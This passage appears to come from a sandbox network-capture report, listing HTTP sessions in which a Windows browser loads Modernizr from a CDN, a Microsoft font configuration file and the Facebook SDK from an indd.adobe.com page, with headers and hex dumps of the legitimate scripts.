                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-30 16:15:38 UTC966INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:15:38 GMT
                                                                                                                                                                                                        Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Cache-Control: public, max-age=30672000
                                                                                                                                                                                                        ETag: W/"5eb03f26-2b4c"
                                                                                                                                                                                                        Last-Modified: Mon, 04 May 2020 16:13:26 GMT
                                                                                                                                                                                                        cf-cdnjs-via: cfworker/kv
                                                                                                                                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                        Timing-Allow-Origin: *
                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                        Age: 765025
                                                                                                                                                                                                        Expires: Wed, 20 Aug 2025 16:15:38 GMT
                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tlzwMW4kg3t2BatoVJnmOwYjtOJdpofIsUA%2Bg1h7a%2B8cQLM7WWWXsBU67SlwWB9rzXy7St%2Fd4r6%2Bm%2FI9f0r2nlduH7JmxnWvqf70FaXvakCygk7O%2FbExHKTXfPbDm%2FVHra5RvcF5"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                        NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                        Strict-Transport-Security: max-age=15780000
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        CF-RAY: 8bb614a6ed8719c7-EWR
                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                        2024-08-30 16:15:38 UTC403INData Raw: 32 62 34 63 0d 0a 77 69 6e 64 6f 77 2e 4d 6f 64 65 72 6e 69 7a 72 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 66 75 6e 63 74 69 6f 6e 20 72 28 65 29 7b 62 2e 63 73 73 54 65 78 74 3d 65 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 72 28 53 2e 6a 6f 69 6e 28 65 2b 22 3b 22 29 2b 28 74 7c 7c 22 22 29 29 7d 66 75 6e 63 74 69 6f 6e 20 61 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 79 70 65 6f 66 20 65 3d 3d 3d 74 7d 66 75 6e 63 74 69 6f 6e 20 69 28 65 2c 74 29 7b 72 65 74 75 72 6e 21 21 7e 28 22 22 2b 65 29 2e 69 6e 64 65 78 4f 66 28 74 29 7d 66 75 6e 63 74 69 6f 6e 20 63 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 72 20 69 6e 20 65 29 7b 76 61 72 20 6f 3d 65 5b 72 5d 3b 69 66 28 21 69 28 6f 2c 22 2d 22 29 26 26 62 5b 6f 5d 21 3d
                                                                                                                                                                                                        Data Ascii: 2b4cwindow.Modernizr=function(e,t,n){function r(e){b.cssText=e}function o(e,t){return r(S.join(e+";")+(t||""))}function a(e,t){return typeof e===t}function i(e,t){return!!~(""+e).indexOf(t)}function c(e,t){for(var r in e){var o=e[r];if(!i(o,"-")&&b[o]!=
                                                                                                                                                                                                        2024-08-30 16:15:38 UTC1369INData Raw: 66 75 6e 63 74 69 6f 6e 20 75 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 3d 65 2e 63 68 61 72 41 74 28 30 29 2e 74 6f 55 70 70 65 72 43 61 73 65 28 29 2b 65 2e 73 6c 69 63 65 28 31 29 2c 6f 3d 28 65 2b 22 20 22 2b 6b 2e 6a 6f 69 6e 28 72 2b 22 20 22 29 2b 72 29 2e 73 70 6c 69 74 28 22 20 22 29 3b 72 65 74 75 72 6e 20 61 28 74 2c 22 73 74 72 69 6e 67 22 29 7c 7c 61 28 74 2c 22 75 6e 64 65 66 69 6e 65 64 22 29 3f 63 28 6f 2c 74 29 3a 28 6f 3d 28 65 2b 22 20 22 2b 54 2e 6a 6f 69 6e 28 72 2b 22 20 22 29 2b 72 29 2e 73 70 6c 69 74 28 22 20 22 29 2c 73 28 6f 2c 74 2c 6e 29 29 7d 66 75 6e 63 74 69 6f 6e 20 6c 28 29 7b 70 2e 69 6e 70 75 74 3d 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 2c 6f 3d 6e 2e 6c 65 6e 67 74 68 3b 6f 3e 72 3b 72 2b 2b
                                                                                                                                                                                                        Data Ascii: function u(e,t,n){var r=e.charAt(0).toUpperCase()+e.slice(1),o=(e+" "+k.join(r+" ")+r).split(" ");return a(t,"string")||a(t,"undefined")?c(o,t):(o=(e+" "+T.join(r+" ")+r).split(" "),s(o,t,n))}function l(){p.input=function(n){for(var r=0,o=n.length;o>r;r++
                                                                                                                                                                                                        2024-08-30 16:15:38 UTC1369INData Raw: 63 65 2c 46 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 72 2c 6f 29 7b 76 61 72 20 61 2c 69 2c 63 2c 73 2c 75 3d 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 2c 6c 3d 74 2e 62 6f 64 79 2c 64 3d 6c 7c 7c 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 62 6f 64 79 22 29 3b 69 66 28 70 61 72 73 65 49 6e 74 28 72 2c 31 30 29 29 66 6f 72 28 3b 72 2d 2d 3b 29 63 3d 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 2c 63 2e 69 64 3d 6f 3f 6f 5b 72 5d 3a 76 2b 28 72 2b 31 29 2c 75 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 63 29 3b 72 65 74 75 72 6e 20 61 3d 5b 22 26 23 31 37 33 3b 22 2c 27 3c 73 74 79 6c 65 20 69 64 3d 22 73 27 2c 76 2c 27 22 3e 27 2c 65 2c 22 3c 2f 73 74 79 6c 65 3e 22 5d 2e 6a 6f 69 6e 28 22 22 29 2c 75 2e 69
                                                                                                                                                                                                        Data Ascii: ce,F=function(e,n,r,o){var a,i,c,s,u=t.createElement("div"),l=t.body,d=l||t.createElement("body");if(parseInt(r,10))for(;r--;)c=t.createElement("div"),c.id=o?o[r]:v+(r+1),u.appendChild(c);return a=["&#173;",'<style id="s',v,'">',e,"</style>"].join(""),u.i
                                                                                                                                                                                                        2024-08-30 16:15:38 UTC1369INData Raw: 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 74 68 69 73 3b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 21 3d 74 79 70 65 6f 66 20 74 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 3b 76 61 72 20 6e 3d 44 2e 63 61 6c 6c 28 61 72 67 75 6d 65 6e 74 73 2c 31 29 2c 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 74 68 69 73 20 69 6e 73 74 61 6e 63 65 6f 66 20 72 29 7b 76 61 72 20 6f 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 6f 2e 70 72 6f 74 6f 74 79 70 65 3d 74 2e 70 72 6f 74 6f 74 79 70 65 3b 76 61 72 20 61 3d 6e 65 77 20 6f 2c 69 3d 74 2e 61 70 70 6c 79 28 61 2c 6e 2e 63 6f 6e 63 61 74 28 44 2e 63 61 6c 6c 28 61 72 67 75 6d 65 6e 74 73 29 29 29 3b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 28 69 29 3d 3d 3d 69 3f 69 3a 61 7d 72 65 74 75 72 6e 20 74 2e 61 70
                                                                                                                                                                                                        Data Ascii: ion(e){var t=this;if("function"!=typeof t)throw new TypeError;var n=D.call(arguments,1),r=function(){if(this instanceof r){var o=function(){};o.prototype=t.prototype;var a=new o,i=t.apply(a,n.concat(D.call(arguments)));return Object(i)===i?i:a}return t.ap
                                                                                                                                                                                                        2024-08-30 16:15:38 UTC1369INData Raw: 63 6b 65 74 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 22 57 65 62 53 6f 63 6b 65 74 22 69 6e 20 65 7c 7c 22 4d 6f 7a 57 65 62 53 6f 63 6b 65 74 22 69 6e 20 65 7d 2c 4d 2e 72 67 62 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 28 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 31 35 30 2c 32 35 35 2c 31 35 30 2c 2e 35 29 22 29 2c 69 28 62 2e 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 2c 22 72 67 62 61 22 29 7d 2c 4d 2e 68 73 6c 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 28 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 68 73 6c 61 28 31 32 30 2c 34 30 25 2c 31 30 30 25 2c 2e 35 29 22 29 2c 69 28 62 2e 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 2c 22 72 67 62 61 22 29 7c 7c
                                                                                                                                                                                                        Data Ascii: ckets=function(){return"WebSocket"in e||"MozWebSocket"in e},M.rgba=function(){return r("background-color:rgba(150,255,150,.5)"),i(b.backgroundColor,"rgba")},M.hsla=function(){return r("background-color:hsla(120,40%,100%,.5)"),i(b.backgroundColor,"rgba")||
                                                                                                                                                                                                        2024-08-30 16:15:38 UTC1369INData Raw: 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 2d 33 64 29 7b 23 6d 6f 64 65 72 6e 69 7a 72 7b 6c 65 66 74 3a 39 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 68 65 69 67 68 74 3a 33 70 78 3b 7d 7d 22 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 65 3d 39 3d 3d 3d 74 2e 6f 66 66 73 65 74 4c 65 66 74 26 26 33 3d 3d 3d 74 2e 6f 66 66 73 65 74 48 65 69 67 68 74 7d 29 2c 65 7d 2c 4d 2e 63 73 73 74 72 61 6e 73 69 74 69 6f 6e 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 75 28 22 74 72 61 6e 73 69 74 69 6f 6e 22 29 7d 2c 4d 2e 66 6f 6e 74 66 61 63 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3b 72 65 74 75 72 6e 20 46 28 27 40 66 6f 6e 74 2d 66 61 63 65 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 66 6f 6e 74 22 3b 73 72 63 3a 75 72
                                                                                                                                                                                                        Data Ascii: bkit-transform-3d){#modernizr{left:9px;position:absolute;height:3px;}}",function(t){e=9===t.offsetLeft&&3===t.offsetHeight}),e},M.csstransitions=function(){return u("transition")},M.fontface=function(){var e;return F('@font-face {font-family:"font";src:ur
                                                                                                                                                                                                        2024-08-30 16:15:38 UTC1369INData Raw: 6e 20 6e 7d 2c 4d 2e 6c 6f 63 61 6c 73 74 6f 72 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 72 65 74 75 72 6e 20 6c 6f 63 61 6c 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 76 2c 76 29 2c 6c 6f 63 61 6c 53 74 6f 72 61 67 65 2e 72 65 6d 6f 76 65 49 74 65 6d 28 76 29 2c 21 30 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 21 31 7d 7d 2c 4d 2e 73 65 73 73 69 6f 6e 73 74 6f 72 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 72 65 74 75 72 6e 20 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 76 2c 76 29 2c 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 72 65 6d 6f 76 65 49 74 65 6d 28 76 29 2c 21 30 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 21 31 7d 7d 2c 4d 2e 77 65 62 77 6f 72 6b 65 72 73 3d 66 75 6e 63 74
                                                                                                                                                                                                        Data Ascii: n n},M.localstorage=function(){try{return localStorage.setItem(v,v),localStorage.removeItem(v),!0}catch(e){return!1}},M.sessionstorage=function(){try{return sessionStorage.setItem(v,v),sessionStorage.removeItem(v),!0}catch(e){return!1}},M.webworkers=funct
                                                                                                                                                                                                        2024-08-30 16:15:38 UTC1369INData Raw: 6e 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 3f 65 2e 73 70 6c 69 74 28 22 20 22 29 3a 65 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 65 29 7b 76 61 72 20 74 3d 76 5b 65 5b 68 5d 5d 3b 72 65 74 75 72 6e 20 74 7c 7c 28 74 3d 7b 7d 2c 67 2b 2b 2c 65 5b 68 5d 3d 67 2c 76 5b 67 5d 3d 74 29 2c 74 7d 66 75 6e 63 74 69 6f 6e 20 61 28 65 2c 6e 2c 72 29 7b 69 66 28 6e 7c 7c 28 6e 3d 74 29 2c 6c 29 72 65 74 75 72 6e 20 6e 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 65 29 3b 72 7c 7c 28 72 3d 6f 28 6e 29 29 3b 76 61 72 20 61 3b 72 65 74 75 72 6e 20 61 3d 72 2e 63 61 63 68 65 5b 65 5d 3f 72 2e 63 61 63 68 65 5b 65 5d 2e 63 6c 6f 6e 65 4e 6f 64 65 28 29 3a 70 2e 74 65 73 74 28 65 29 3f 28 72 2e 63 61 63 68 65 5b 65 5d 3d 72 2e 63 72 65 61 74 65 45 6c 65 6d 28 65
                                                                                                                                                                                                        Data Ascii: n"string"==typeof e?e.split(" "):e}function o(e){var t=v[e[h]];return t||(t={},g++,e[h]=g,v[g]=t),t}function a(e,n,r){if(n||(n=t),l)return n.createElement(e);r||(r=o(n));var a;return a=r.cache[e]?r.cache[e].cloneNode():p.test(e)?(r.cache[e]=r.createElem(e
                                                                                                                                                                                                        2024-08-30 16:15:38 UTC1106INData Raw: 7c 73 70 61 6e 7c 73 74 72 6f 6e 67 7c 73 74 79 6c 65 7c 74 61 62 6c 65 7c 74 62 6f 64 79 7c 74 64 7c 74 68 7c 74 72 7c 75 6c 29 24 2f 69 2c 68 3d 22 5f 68 74 6d 6c 35 73 68 69 76 22 2c 67 3d 30 2c 76 3d 7b 7d 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 61 22 29 3b 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 78 79 7a 3e 3c 2f 78 79 7a 3e 22 2c 75 3d 22 68 69 64 64 65 6e 22 69 6e 20 65 2c 6c 3d 31 3d 3d 65 2e 63 68 69 6c 64 4e 6f 64 65 73 2e 6c 65 6e 67 74 68 7c 7c 66 75 6e 63 74 69 6f 6e 28 29 7b 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 61 22 29 3b 76 61 72 20 65 3d 74 2e 63 72 65 61 74 65 44 6f 63 75 6d 65 6e 74 46 72 61 67 6d 65 6e 74 28 29 3b 72 65 74 75 72 6e 22 75 6e
                                                                                                                                                                                                        Data Ascii: |span|strong|style|table|tbody|td|th|tr|ul)$/i,h="_html5shiv",g=0,v={};!function(){try{var e=t.createElement("a");e.innerHTML="<xyz></xyz>",u="hidden"in e,l=1==e.childNodes.length||function(){t.createElement("a");var e=t.createDocumentFragment();return"un
                                                                                                                                                                                                        2024-08-30 16:15:38 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        3192.168.2.549722184.28.90.27443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:15:39 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                                                        User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                                        Host: fs.microsoft.com
                                                                                                                                                                                                        2024-08-30 16:15:39 UTC466INHTTP/1.1 200 OK
                                                                                                                                                                                                        Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                        ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                                        Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                        Server: ECAcc (lpl/EF06)
                                                                                                                                                                                                        X-CID: 11
                                                                                                                                                                                                        X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                                                                        X-Ms-Region: prod-weu-z1
                                                                                                                                                                                                        Cache-Control: public, max-age=62474
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:15:39 GMT
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        X-CID: 2


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        4192.168.2.549725184.28.90.27443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:15:40 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                                                        If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                        Range: bytes=0-2147483646
                                                                                                                                                                                                        User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                                        Host: fs.microsoft.com
                                                                                                                                                                                                        2024-08-30 16:15:40 UTC514INHTTP/1.1 200 OK
                                                                                                                                                                                                        ApiVersion: Distribute 1.1
                                                                                                                                                                                                        Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                        ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                                        Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                        Server: ECAcc (lpl/EF06)
                                                                                                                                                                                                        X-CID: 11
                                                                                                                                                                                                        X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                                                                        X-Ms-Region: prod-weu-z1
                                                                                                                                                                                                        Cache-Control: public, max-age=62426
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:15:40 GMT
                                                                                                                                                                                                        Content-Length: 55
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        X-CID: 2
                                                                                                                                                                                                        2024-08-30 16:15:40 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                                                                                                                                        Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        5192.168.2.549724157.240.252.134436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:15:40 UTC559OUTGET /en_US/sdk.js HTTP/1.1
                                                                                                                                                                                                        Host: connect.facebook.net
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        Origin: https://indd.adobe.com
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                        Referer: https://indd.adobe.com/
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-30 16:15:40 UTC1850INHTTP/1.1 200 OK
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Access-Control-Expose-Headers: X-FB-Content-MD5
                                                                                                                                                                                                        x-fb-content-md5: a34da8c52525d3689f7bb764e2a2a4b0
                                                                                                                                                                                                        ETag: "bd95eb122771b57d547e6744f1f6c345"
                                                                                                                                                                                                        Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                        timing-allow-origin: *
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        content-md5: o02oxSUl02ife7dk4qKksA==
                                                                                                                                                                                                        Expires: Fri, 30 Aug 2024 16:16:04 GMT
                                                                                                                                                                                                        Cache-Control: public,max-age=1200,stale-while-revalidate=3600
                                                                                                                                                                                                        reporting-endpoints: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", permissions_policy="https://www.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                        document-policy: force-load-at-top
                                                                                                                                                                                                        permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                        cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                        cross-origin-embedder-policy-report-only: require-corp;report-to="coep_report"
                                                                                                                                                                                                        cross-origin-opener-policy: same-origin-allow-popups;report-to="coop_report"
                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                        2024-08-30 16:15:40 UTC872INData Raw: 72 65 70 6f 72 74 2d 74 6f 3a 20 7b 22 6d 61 78 5f 61 67 65 22 3a 32 35 39 32 30 30 30 2c 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 62 72 6f 77 73 65 72 5f 72 65 70 6f 72 74 69 6e 67 5c 2f 63 6f 6f 70 5c 2f 3f 6d 69 6e 69 6d 69 7a 65 3d 30 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 6f 6f 70 5f 72 65 70 6f 72 74 22 2c 22 69 6e 63 6c 75 64 65 5f 73 75 62 64 6f 6d 61 69 6e 73 22 3a 74 72 75 65 7d 2c 20 7b 22 6d 61 78 5f 61 67 65 22 3a 38 36 34 30 30 2c 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 62 72 6f 77 73 65 72 5f 72 65 70 6f 72 74 69 6e 67 5c 2f 63
                                                                                                                                                                                                        Data Ascii: report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/c
                                                                                                                                                                                                        2024-08-30 16:15:40 UTC1INData Raw: 2f
                                                                                                                                                                                                        Data Ascii: /
                                                                                                                                                                                                        2024-08-30 16:15:40 UTC3092INData Raw: 2a 31 37 32 35 30 33 33 33 36 34 2c 2c 4a 49 54 20 43 6f 6e 73 74 72 75 63 74 69 6f 6e 3a 20 76 31 30 31 36 31 30 38 32 37 32 2c 65 6e 5f 55 53 2a 2f 0a 0a 2f 2a 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 31 37 2d 70 72 65 73 65 6e 74 2c 20 46 61 63 65 62 6f 6f 6b 2c 20 49 6e 63 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 0a 20 2a 0a 20 2a 20 59 6f 75 20 61 72 65 20 68 65 72 65 62 79 20 67 72 61 6e 74 65 64 20 61 20 6e 6f 6e 2d 65 78 63 6c 75 73 69 76 65 2c 20 77 6f 72 6c 64 77 69 64 65 2c 20 72 6f 79 61 6c 74 79 2d 66 72 65 65 20 6c 69 63 65 6e 73 65 20 74 6f 20 75 73 65 2c 0a 20 2a 20 63 6f 70 79 2c 20 6d 6f 64 69 66 79 2c 20 61 6e 64 20 64 69 73 74 72 69 62 75 74 65 20 74 68 69 73 20 73 6f 66 74 77 61 72 65 20
                                                                                                                                                                                                        Data Ascii: *1725033364,,JIT Construction: v1016108272,en_US*//** * Copyright (c) 2017-present, Facebook, Inc. All rights reserved. * * You are hereby granted a non-exclusive, worldwide, royalty-free license to use, * copy, modify, and distribute this software


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        6192.168.2.549729157.240.252.134436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:15:42 UTC597OUTGET /en_US/sdk.js?hash=cfe36e7e683e5528b12db8f17a4d3eaa HTTP/1.1
                                                                                                                                                                                                        Host: connect.facebook.net
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        Origin: https://indd.adobe.com
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                        Referer: https://indd.adobe.com/
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-30 16:15:42 UTC1864INHTTP/1.1 200 OK
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Access-Control-Expose-Headers: X-FB-Content-MD5
                                                                                                                                                                                                        x-fb-content-md5: 8256c1883573912d3dab7a5faa4a258d
                                                                                                                                                                                                        ETag: "acff5378dda12f8dc288925b0b89b466"
                                                                                                                                                                                                        Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                        timing-allow-origin: *
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        content-md5: glbBiDVzkS09q3pfqkoljQ==
                                                                                                                                                                                                        Expires: Sat, 30 Aug 2025 15:22:16 GMT
                                                                                                                                                                                                        Cache-Control: public,max-age=31536000,stale-while-revalidate=3600,immutable
                                                                                                                                                                                                        reporting-endpoints: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", permissions_policy="https://www.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                        document-policy: force-load-at-top
